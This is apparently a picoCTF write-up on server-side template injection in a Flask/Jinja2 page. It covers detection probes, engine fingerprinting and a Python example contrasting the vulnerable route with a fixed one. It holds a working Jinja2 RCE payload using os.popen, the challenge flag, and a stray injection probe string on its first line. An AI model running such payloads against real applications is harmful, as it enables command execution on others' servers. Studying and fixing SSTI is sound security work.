{%if 1==1%}SSTIOK26488{%endif%}

SSTI Exploit Walkthrough

  • The challenge runs a Flask/Jinja2-based web page that echoes user-provided content directly into the template. (Source: hwkim301.com)

  • Sending {{7*7}} makes the server return 49, proving that the engine evaluates Jinja2 syntax. (Source: hwkim301.com)

  • Sending {{7*'7'}} yields 7777777, which distinguishes Jinja2 from Twig, where the same probe evaluates to 49. (Source: hwkim301.com)

  • An RCE payload can leverage the built-in __builtins__ and os.popen to execute arbitrary commands. (Source: portswigger.net)

    • Payload: {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}
    • The server prints the flag picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r0c3b6390}. (Source: hwkim301.com)

  • Examining the source code shows a one-liner route that concatenates the POSTed input straight into the rendered template. (Source: hwkim301.com)
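The concatenating route described above next to its hardened form, as an added example that is not part of the walkthrough's own code. It drives Jinja2 directly rather than through Flask, the page shell and function names are constructed, and it only exercises the two detection probes from the list, not the RCE payload.

```python
# Added example (not from the walkthrough): the vulnerable concatenating route
# beside its fix, rendered with Jinja2 directly. Flask's render_template_string
# is a thin wrapper around the same engine, so the behaviour is identical.
from jinja2 import Environment

# autoescape=True is what Flask applies to .html templates; it stops HTML
# injection but does nothing against SSTI, which happens one step earlier,
# when user text becomes template *source* instead of template *data*.
env = Environment(autoescape=True)


def render_vulnerable(user_input: str) -> str:
    """Mirrors the one-liner route: POSTed text is concatenated into the
    template source, so Jinja2 parses and evaluates whatever it contains."""
    template_source = "<h1>Echo</h1><p>" + user_input + "</p>"  # constructed shell
    return env.from_string(template_source).render()


def render_fixed(user_input: str) -> str:
    """Hardened route: the template is a constant and user text is passed as a
    context variable, so {{ }} in the input is plain data and gets escaped."""
    template = env.from_string("<h1>Echo</h1><p>{{ content }}</p>")
    return template.render(content=user_input)


def probe(renderer, payload: str) -> str:
    """Return only what the renderer produced for the injected text."""
    out = renderer(payload)
    start = out.index("<p>") + 3
    return out[start:out.index("</p>", start)]


def evaluates_templates(renderer) -> bool:
    """Detection step from the walkthrough: {{7*7}} coming back as 49 means
    the input was executed as a template rather than displayed."""
    return probe(renderer, "{{7*7}}") == "49"


def fingerprint(renderer) -> str:
    """Engine identification step: Jinja2 repeats the string ('7777777'),
    Twig would compute 49. Only meaningful once evaluates_templates() is True."""
    result = probe(renderer, "{{7*'7'}}")
    if result == "7777777":
        return "jinja2"
    if result == "49":
        return "twig"
    return "unknown"


if __name__ == "__main__":
    for name, r in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        print(name, evaluates_templates(r), fingerprint(r), repr(probe(r, "{{7*7}}")))
```

The fixed route returns the probe text unchanged, so both the detection and the fingerprinting step fail against it; the vulnerable route answers 49 and 7777777 exactly as the walkthrough reports.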


The walkthrough demonstrates how SSTI can be detected, how the responsible template engine is identified, and finally how the flaw is abused to retrieve the flag.